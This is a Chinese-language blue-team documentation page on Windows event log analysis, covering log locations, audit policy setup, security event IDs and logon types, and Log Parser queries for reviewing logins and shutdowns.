
<!doctype html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.1.8">
    
    
      
        <title>日志分析 - klsfct Docs</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.6e60f8b8.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.e6a45f82.min.css">
        
          
          
          <meta name="theme-color" content="#000000">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../js/stylesheets/extra.css">
    
    <script>__md_scope=new URL("../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="" data-md-color-primary="black" data-md-color-accent="deep-orange">
  
    
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#1window" class="md-skip">
          跳转至
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="页眉">
    <a href="../.." title="klsfct Docs" class="md-header__button md-logo" aria-label="klsfct Docs" data-md-component="logo">
      
  <img src="../../images/logo.jpg" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            klsfct Docs
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              日志分析
            
          </span>
        </div>
      </div>
    </div>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="搜索" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="查找">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="清空当前内容" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            正在初始化搜索引擎
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="标签" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  


  <li class="md-tabs__item">
    <a href="../.." class="md-tabs__link">
      主页
    </a>
  </li>

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../redteam/%E7%BA%A2%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-tabs__link">
        红队
      </a>
    </li>
  

      
        
  
  
    
  


  
  
  
    <li class="md-tabs__item">
      <a href="../%E8%93%9D%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-tabs__link md-tabs__link--active">
        蓝队
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../about/aboutme/" class="md-tabs__link">
        About
      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="导航栏" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="klsfct Docs" class="md-nav__button md-logo" aria-label="klsfct Docs" data-md-component="logo">
      
  <img src="../../images/logo.jpg" alt="logo">

    </a>
    klsfct Docs
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        主页
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" data-md-state="indeterminate" type="checkbox" id="__nav_2" checked>
      
      
      
        
          
        
          
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_2">
          红队
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="红队" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          红队
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E7%BA%A2%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="md-nav__link">
        信息收集
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E6%BC%8F%E6%B4%9E%E5%BA%93/" class="md-nav__link">
        漏洞库
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E6%BA%AF%E6%BA%90%E5%88%86%E6%9E%90/" class="md-nav__link">
        溯源分析
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E9%92%93%E9%B1%BC/" class="md-nav__link">
        钓鱼
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" checked>
      
      
      
        
          
        
          
        
          
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_3">
          蓝队
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="蓝队" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          蓝队
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E8%93%9D%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" class="md-nav__link">
        应急响应
      </a>
    </li>
  

            
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          日志分析
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        日志分析
      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1window" class="md-nav__link">
    第1篇:Window日志分析
  </a>
  
    <nav class="md-nav" aria-label="第1篇:Window日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-window" class="md-nav__link">
    0x01 Window事件日志简介
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02" class="md-nav__link">
    0X02 审核策略与事件查看器
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03" class="md-nav__link">
    0x03 事件日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x04" class="md-nav__link">
    0x04 日志分析工具
  </a>
  
    <nav class="md-nav" aria-label="0x04 日志分析工具">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#log-parser" class="md-nav__link">
    Log Parser
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#logparser-lizard" class="md-nav__link">
    LogParser Lizard
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#event-log-explorer" class="md-nav__link">
    Event Log Explorer
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2linux" class="md-nav__link">
    第2篇:Linux日志分析
  </a>
  
    <nav class="md-nav" aria-label="第2篇:Linux日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x00" class="md-nav__link">
    0x00 前言
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x01" class="md-nav__link">
    0x01 日志简介
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_1" class="md-nav__link">
    0x02 日志分析技巧
  </a>
  
    <nav class="md-nav" aria-label="0x02 日志分析技巧">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#ashell" class="md-nav__link">
    A、常用的shell命令
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#b" class="md-nav__link">
    B、日志分析技巧
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3web" class="md-nav__link">
    第3篇:Web日志分析
  </a>
  
    <nav class="md-nav" aria-label="第3篇:Web日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#ox01-web" class="md-nav__link">
    ox01 Web日志
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_2" class="md-nav__link">
    0x02 日志分析技巧
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03_1" class="md-nav__link">
    0x03 日志分析案例
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x04_1" class="md-nav__link">
    0x04 日志统计分析技巧
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4mssql" class="md-nav__link">
    第4篇:MSSQL日志分析
  </a>
  
    <nav class="md-nav" aria-label="第4篇:MSSQL日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-mssql" class="md-nav__link">
    0x01 MSSQL日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02-sql" class="md-nav__link">
    0x02 SQL注入入侵痕迹
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5mysql" class="md-nav__link">
    第5篇:MySQL日志分析
  </a>
  
    <nav class="md-nav" aria-label="第5篇:MySQL日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-mysql" class="md-nav__link">
    0x01 Mysql日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_3" class="md-nav__link">
    0x02 登录成功/失败
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03-sql" class="md-nav__link">
    0x03 SQL注入入侵痕迹
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../window实战.md" class="md-nav__link">
        window实战
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/linux实战.md" class="md-nav__link">
        linux实战
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/web实战.md" class="md-nav__link">
        web实战
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" data-md-state="indeterminate" type="checkbox" id="__nav_4" checked>
      
      
      
        
          
        
      
      
        <label class="md-nav__link" for="__nav_4">
          About
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="About" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          About
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../about/aboutme/" class="md-nav__link">
        about me
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1window" class="md-nav__link">
    第1篇:Window日志分析
  </a>
  
    <nav class="md-nav" aria-label="第1篇:Window日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-window" class="md-nav__link">
    0x01 Window事件日志简介
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02" class="md-nav__link">
    0X02 审核策略与事件查看器
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03" class="md-nav__link">
    0x03 事件日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x04" class="md-nav__link">
    0x04 日志分析工具
  </a>
  
    <nav class="md-nav" aria-label="0x04 日志分析工具">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#log-parser" class="md-nav__link">
    Log Parser
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#logparser-lizard" class="md-nav__link">
    LogParser Lizard
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#event-log-explorer" class="md-nav__link">
    Event Log Explorer
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2linux" class="md-nav__link">
    第2篇:Linux日志分析
  </a>
  
    <nav class="md-nav" aria-label="第2篇:Linux日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x00" class="md-nav__link">
    0x00 前言
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x01" class="md-nav__link">
    0x01 日志简介
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_1" class="md-nav__link">
    0x02 日志分析技巧
  </a>
  
    <nav class="md-nav" aria-label="0x02 日志分析技巧">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#ashell" class="md-nav__link">
    A、常用的shell命令
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#b" class="md-nav__link">
    B、日志分析技巧
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3web" class="md-nav__link">
    第3篇:Web日志分析
  </a>
  
    <nav class="md-nav" aria-label="第3篇:Web日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#ox01-web" class="md-nav__link">
    ox01 Web日志
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_2" class="md-nav__link">
    0x02 日志分析技巧
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03_1" class="md-nav__link">
    0x03 日志分析案例
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x04_1" class="md-nav__link">
    0x04 日志统计分析技巧
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4mssql" class="md-nav__link">
    第4篇:MSSQL日志分析
  </a>
  
    <nav class="md-nav" aria-label="第4篇:MSSQL日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-mssql" class="md-nav__link">
    0x01 MSSQL日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02-sql" class="md-nav__link">
    0x02 SQL注入入侵痕迹
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5mysql" class="md-nav__link">
    第5篇:MySQL日志分析
  </a>
  
    <nav class="md-nav" aria-label="第5篇:MySQL日志分析">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#0x01-mysql" class="md-nav__link">
    0x01 Mysql日志分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x02_3" class="md-nav__link">
    0x02 登录成功/失败
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#0x03-sql" class="md-nav__link">
    0x03 SQL注入入侵痕迹
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

  <h1>日志分析</h1>

<h2 id="1window">第1篇:Window日志分析<a class="headerlink" href="#1window" title="Permanent link">&para;</a></h2>
<h3 id="0x01-window">0x01 Window事件日志简介<a class="headerlink" href="#0x01-window" title="Permanent link">&para;</a></h3>
<p>Windows系统日志是记录系统中硬件、软件和系统问题的信息，同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因，或者寻找受到攻击时攻击者留下的痕迹。</p>
<p>Windows主要有以下三类日志记录系统事件：应用程序日志、系统日志和安全日志。</p>
<p><strong>系统日志</strong></p>
<div class="highlight"><pre><span></span><code>记录操作系统组件产生的事件，主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。

默认位置： %SystemRoot%\System32\Winevt\Logs\System.evtx
</code></pre></div>
<p><strong>应用程序日志</strong></p>
<div class="highlight"><pre><span></span><code>包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件，例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况，那么我们可以从程序事件日志中找到相应的记录，也许会有助于你解决问题。 

默认位置：%SystemRoot%\System32\Winevt\Logs\Application.evtx
</code></pre></div>
<p><strong>安全日志</strong></p>
<div class="highlight"><pre><span></span><code>记录系统的安全审计事件，包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认设置下，安全性日志是关闭的，管理员可以使用组策略来启动安全性日志，或者在注册表中设置审核策略，以便当安全性日志满后使系统停止响应。

默认位置：%SystemRoot%\System32\Winevt\Logs\Security.evtx
</code></pre></div>
<p>系统和应用程序日志存储着故障排除信息，对于系统管理员更为有用。 安全日志记录着事件审计信息，包括用户验证（登录、远程访问等）和特定用户在认证后对系统做了什么，对于调查人员而言，更有帮助。</p>
<h3 id="0x02">0X02 审核策略与事件查看器<a class="headerlink" href="#0x02" title="Permanent link">&para;</a></h3>
<p>Windows Server 2008 R2 系统的审核功能在默认状态下并没有启用 ，建议开启审核策略，若日后系统出现故障、安全事故则可以查看系统的日志文件，排除故障，追查入侵者的信息等。</p>
<p>PS：默认状态下，也会记录一些简单的日志，日志默认大小20M</p>
<p><strong>设置1</strong>：开始 → 管理工具 → 本地安全策略 → 本地策略 → 审核策略，参考配置操作：</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-1.png" /></p>
<p><strong>设置2</strong>：设置合理的日志属性，即日志最大大小、事件覆盖阀值等：</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-2.png" /></p>
<p><strong>查看系统日志方法：</strong></p>
<ol>
<li>
<p>在**“开始”<strong>菜单上，依次指向</strong>“所有程序”<strong>、</strong>“管理工具”<strong>，然后单击</strong>“事件查看器”**</p>
</li>
<li>
<p>按 "<strong>Window+R</strong>"，输入 ”<strong>eventvwr.msc</strong>“ 也可以直接进入“<strong>事件查看器</strong>”</p>
</li>
</ol>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-3.png" /></p>
<h3 id="0x03">0x03 事件日志分析<a class="headerlink" href="#0x03" title="Permanent link">&para;</a></h3>
<p>对于Windows事件日志分析，不同的EVENT ID代表了不同的意义，摘录一些常见的安全事件的说明：</p>
<table>
<thead>
<tr>
<th align="left">事件ID</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">4624</td>
<td>登录成功</td>
</tr>
<tr>
<td align="left">4625</td>
<td>登录失败</td>
</tr>
<tr>
<td align="left">4634</td>
<td>注销成功</td>
</tr>
<tr>
<td align="left">4647</td>
<td>用户启动的注销</td>
</tr>
<tr>
<td align="left">4672</td>
<td>使用超级用户（如管理员）进行登录</td>
</tr>
<tr>
<td align="left">4720</td>
<td>创建用户</td>
</tr>
</tbody>
</table>
<p>每个成功登录的事件都会标记一个登录类型，不同登录类型代表不同的方式：</p>
<table>
<thead>
<tr>
<th align="left">登录类型</th>
<th>描述</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">2</td>
<td>交互式登录（Interactive）</td>
<td>用户在本地进行登录。</td>
</tr>
<tr>
<td align="left">3</td>
<td>网络（Network）</td>
<td>最常见的情况就是连接到共享文件夹或共享打印机时。</td>
</tr>
<tr>
<td align="left">4</td>
<td>批处理（Batch）</td>
<td>通常表明某计划任务启动。</td>
</tr>
<tr>
<td align="left">5</td>
<td>服务（Service）</td>
<td>每种服务都被配置在某个特定的用户账号下运行。</td>
</tr>
<tr>
<td align="left">7</td>
<td>解锁（Unlock）</td>
<td>屏保解锁。</td>
</tr>
<tr>
<td align="left">8</td>
<td>网络明文（NetworkCleartext）</td>
<td>登录的密码在网络上是通过明文传输的，如FTP。</td>
</tr>
<tr>
<td align="left">9</td>
<td>新凭证（NewCredentials）</td>
<td>使用带/Netonly参数的RUNAS命令运行一个程序。</td>
</tr>
<tr>
<td align="left">10</td>
<td>远程交互，（RemoteInteractive）</td>
<td>通过终端服务、远程桌面或远程协助访问计算机。</td>
</tr>
<tr>
<td align="left">11</td>
<td>缓存交互（CachedInteractive）</td>
<td>以一个域用户登录而又没有域控制器可用</td>
</tr>
</tbody>
</table>
<p>关于更多EVENT ID，详见微软官方网站上找到了“Windows Vista 和 Windows Server 2008 中的安全事件的说明”。</p>
<blockquote>
<p>原文链接 ：<a href="https://support.microsoft.com/zh-cn/help/977519/description-of-security-events-in-windows-7-and-in-windows-server-2008">https://support.microsoft.com/zh-cn/help/977519/description-of-security-events-in-windows-7-and-in-windows-server-2008</a></p>
</blockquote>
<p>案例1：可以利用eventlog事件来查看系统账号登录情况：</p>
<ol>
<li>
<p>在**“开始”<strong>菜单上，依次指向</strong>“所有程序”<strong>、</strong>“管理工具”<strong>，然后单击</strong>“事件查看器”**；</p>
</li>
<li>
<p>在事件查看器中，单击**“安全”**，查看安全日志；</p>
</li>
<li>
<p>在安全日志右侧操作中，点击**“筛选当前日志”**，输入事件ID进行筛选。</p>
</li>
</ol>
<p>4624 --登录成功
   4625 --登录失败
   4634 -- 注销成功 4647 -- 用户启动的注销
   4672 -- 使用超级用户（如管理员）进行登录</p>
<p>我们输入事件ID：4625进行日志筛选，发现事件ID：4625，事件数175904，即用户登录失败了175904次，那么这台服务器管理员账号可能遭遇了暴力猜解。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-4.png" /></p>
<p>案例2：可以利用eventlog事件来查看计算机开关机的记录：</p>
<p>1、在**“开始”<strong>菜单上，依次指向</strong>“所有程序”<strong>、</strong>“管理工具”<strong>，然后单击</strong>“事件查看器”**；</p>
<p>2、在事件查看器中，单击**“系统”**，查看系统日志；</p>
<p>3、在系统日志右侧操作中，点击**“筛选当前日志”**，输入事件ID进行筛选。</p>
<p>其中事件ID 6006 ID6005、 ID 6009就表示不同状态的机器的情况（开关机）。 6005 信息 EventLog 事件日志服务已启动。(开机) 6006 信息 EventLog 事件日志服务已停止。(关机) 6009 信息 EventLog 按ctrl、alt、delete键(非正常)关机</p>
<p>我们输入事件ID：6005-6006进行日志筛选，发现了两条在2018/7/6 17:53:51左右的记录，也就是我刚才对系统进行重启的时间。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-5.png" /></p>
<h3 id="0x04">0x04 日志分析工具<a class="headerlink" href="#0x04" title="Permanent link">&para;</a></h3>
<h4 id="log-parser">Log Parser<a class="headerlink" href="#log-parser" title="Permanent link">&para;</a></h4>
<p>Log Parser（是微软公司出品的日志分析工具，它功能强大，使用简单，可以分析基于文本的日志文件、XML 文件、CSV（逗号分隔符）文件，以及操作系统的事件日志、注册表、文件系统、Active Directory。它可以像使用 SQL 语句一样查询分析这些数据，甚至可以把分析结果以各种图表的形式展现出来。</p>
<p>Log Parser 2.2下载地址：<a href="https://www.microsoft.com/en-us/download/details.aspx?id=24659">https://www.microsoft.com/en-us/download/details.aspx?id=24659</a></p>
<p>Log Parser 使用示例：<a href="https://mlichtenberg.wordpress.com/2011/02/03/log-parser-rocks-more-than-50-examples/">https://mlichtenberg.wordpress.com/2011/02/03/log-parser-rocks-more-than-50-examples/</a></p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-6.png" /></p>
<p><strong>基本查询结构</strong></p>
<div class="highlight"><pre><span></span><code>Logparser.exe –i:EVT –o:DATAGRID &quot;SELECT * FROM c:\xx.evtx&quot;
</code></pre></div>
<p><strong>使用Log Parser分析日志</strong></p>
<p>1、查询登录成功的事件</p>
<div class="highlight"><pre><span></span><code>登录成功的所有事件
LogParser.exe -i:EVT –o:DATAGRID  &quot;SELECT *  FROM c:\Security.evtx where EventID=4624&quot;

指定登录时间范围的事件：
LogParser.exe -i:EVT –o:DATAGRID  &quot;SELECT *  FROM c:\Security.evtx where TimeGenerated&gt;&#39;2018-06-19 23:32:11&#39; and TimeGenerated&lt;&#39;2018-06-20 23:34:00&#39; and EventID=4624&quot;

提取登录成功的用户名和IP：
LogParser.exe -i:EVT  –o:DATAGRID  &quot;SELECT EXTRACT_TOKEN(Message,13,&#39; &#39;) as EventType,TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,&#39;|&#39;) as Username,EXTRACT_TOKEN(Message,38,&#39; &#39;) as Loginip FROM c:\Security.evtx where EventID=4624&quot;
</code></pre></div>
<p>2、查询登录失败的事件</p>
<div class="highlight"><pre><span></span><code>登录失败的所有事件：
LogParser.exe -i:EVT –o:DATAGRID  &quot;SELECT *  FROM c:\Security.evtx where EventID=4625&quot;

提取登录失败用户名进行聚合统计：
LogParser.exe  -i:EVT &quot;SELECT  EXTRACT_TOKEN(Message,13,&#39; &#39;)  as EventType,EXTRACT_TOKEN(Message,19,&#39; &#39;) as user,count(EXTRACT_TOKEN(Message,19,&#39; &#39;)) as Times,EXTRACT_TOKEN(Message,39,&#39; &#39;) as Loginip FROM c:\Security.evtx where EventID=4625 GROUP BY Message&quot;
</code></pre></div>
<p>3、系统历史开关机记录：</p>
<div class="highlight"><pre><span></span><code>LogParser.exe -i:EVT –o:DATAGRID  &quot;SELECT TimeGenerated,EventID,Message FROM c:\System.evtx where EventID=6005 or EventID=6006&quot;
</code></pre></div>
